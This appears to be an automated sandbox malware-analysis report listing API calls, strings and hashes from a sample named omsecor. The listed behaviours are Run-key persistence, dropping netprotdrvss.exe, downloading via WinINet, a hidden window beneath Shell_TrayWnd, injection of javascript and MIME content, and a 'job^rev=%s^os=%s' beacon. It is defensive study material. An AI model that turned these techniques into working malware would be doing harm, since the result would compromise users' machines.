                  • API String ID: 1528952607-1018652783
                  • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                  • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                  • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                  • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 248 40ac78-40ac7a 246->248 249 40ac7c-40ac87 call 4069c0 246->249 253 40ac5a-40ac5e 247->253 251 40ac8e-40ac92 248->251 254 40ac8c-40ac8d 249->254 253->246 253->251 254->251
                  APIs
                  • RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  • API String ID: 3546245721-4228964922
                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                  Control-flow Graph

                  APIs
                  • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CharLower$CommandFileLineModuleName
                  • String ID: /nomove
                  • API String ID: 1338073227-1111986840
                  • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                  • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 274 407d1b-407d31 call 4054ed 271->274 272->274 278 407d33-407d35 274->278 279 407d36-407d60 CreateFileW 274->279 278->279
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CreateCurrentDirectoryModuleName
                  • String ID: \merocz.xc6
                  • API String ID: 3818821825-505599559
                  • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                  • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 293 4077b7-4077ba 291->293 294 4077a7-4077b5 GetLastError 291->294 295 4077e0 292->295 297 4077d2-4077dc 293->297 298 4077bc-4077c8 GetLastError 293->298 296 4077ca call 40a786 294->296 295->289 301 4077cf 296->301 297->286 300 4077de 297->300 298->296 300->295 301->297
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                    • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                    • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                  • String ID:
                  • API String ID: 1536607067-0
                  • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                  • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 4077f0-407829 call 40d530 CreateProcessW
                  APIs
                  • _memset.LIBCMT ref: 00407800
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CreateProcess_memset
                  • String ID:
                  • API String ID: 1177741608-0
                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 312 4069c0-4069fc RegQueryValueExW RegCloseKey
                  APIs
                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                  • RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID:
                  • API String ID: 3356406503-0
                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 313 406d14-406d20 InternetAttemptConnect 314 406d22-406d25 313->314 315 406d26-406d41 InternetOpenW 313->315
                  APIs
                  • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Internet$AttemptConnectOpen
                  • String ID:
                  • API String ID: 2984283330-0
                  • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                  • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                  • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                  • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                  • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                  • String ID: \netprotdrvss.exe$begun.ru
                  • API String ID: 2887986221-2660752650
                  • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                  • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                  • API String ID: 3472027048-1081452883
                  • Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                  • Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                  APIs
                  • DeleteFileW.KERNEL32(?), ref: 00407043
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                  • GetLastError.KERNEL32 ref: 00407079
                  • SetEndOfFile.KERNEL32(?), ref: 0040708F
                  • InternetOpenUrlW.WININET(?,?,00000000,80000000,00000000), ref: 004070A9
                  • CloseHandle.KERNEL32(?), ref: 004070BB
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                  • String ID:
                  • API String ID: 3711279109-0
                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?,?), ref: 0040933E
                  • SysFreeString.OLEAUT32(?), ref: 00409359
                  • SysFreeString.OLEAUT32(?), ref: 00409362
                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: String$Free$Alloc$CharLower
                  • String ID: http:$javascript
                  • API String ID: 1987340527-3435494457
                  • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                  • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406B2A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406B8C
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                  • API String ID: 3546245721-1332223170
                  • Opcode ID: b8f2284a7884e1d84c5472764473ad81ef61371c27a8aebe337e069d7a055d2a
                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                  • Opcode Fuzzy Hash: b8f2284a7884e1d84c5472764473ad81ef61371c27a8aebe337e069d7a055d2a
                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                  APIs
                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                  • SetParent.USER32(?,00000000), ref: 0040A1E2
                  • GetWindowLongW.USER32(?,000000EC), ref: 0040A1ED
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0040A1FE
                  • SetWindowPos.USER32(?,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040A0CE
                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                  • String ID: Shell_TrayWnd$eventConn
                  • API String ID: 2141107913-3455059086
                  • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                  • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                  APIs
                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                  • GetLocalTime.KERNEL32(?), ref: 00407387
                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                  • String ID:
                  • API String ID: 3166187867-0
                  • Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                  • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                  • Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                  • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: </domain>$</url>$<domain>$<url>$http://
                  • API String ID: 2525500382-924421446
                  • Opcode ID: c25fc9fce4e3a5af282b7e8b70485abd1f5e468527c2347077a4c4f87a84cc63
                  • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                  • Opcode Fuzzy Hash: c25fc9fce4e3a5af282b7e8b70485abd1f5e468527c2347077a4c4f87a84cc63
                  • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Sleep$AttemptConnectInternet
                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                  • API String ID: 362191241-2593661552
                  • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                  • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                  • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
